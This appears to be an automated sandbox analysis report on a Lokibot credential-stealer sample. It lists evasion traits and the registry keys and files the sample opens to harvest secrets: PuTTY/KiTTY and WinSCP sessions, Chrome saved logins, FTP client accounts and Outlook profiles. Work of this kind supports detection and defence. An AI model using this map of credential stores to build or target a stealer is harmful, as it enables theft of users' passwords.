Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Static PE information: section name: .x

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AD4
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Code function: 0_2_00402AC0 push eax; ret		0_2_00402AFC

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe TID: 7472

Thread sleep time: -900000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]

0_2_0040317B

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,

0_2_00402B7C

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_00406069 GetUserNameW,

0_2_00406069

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

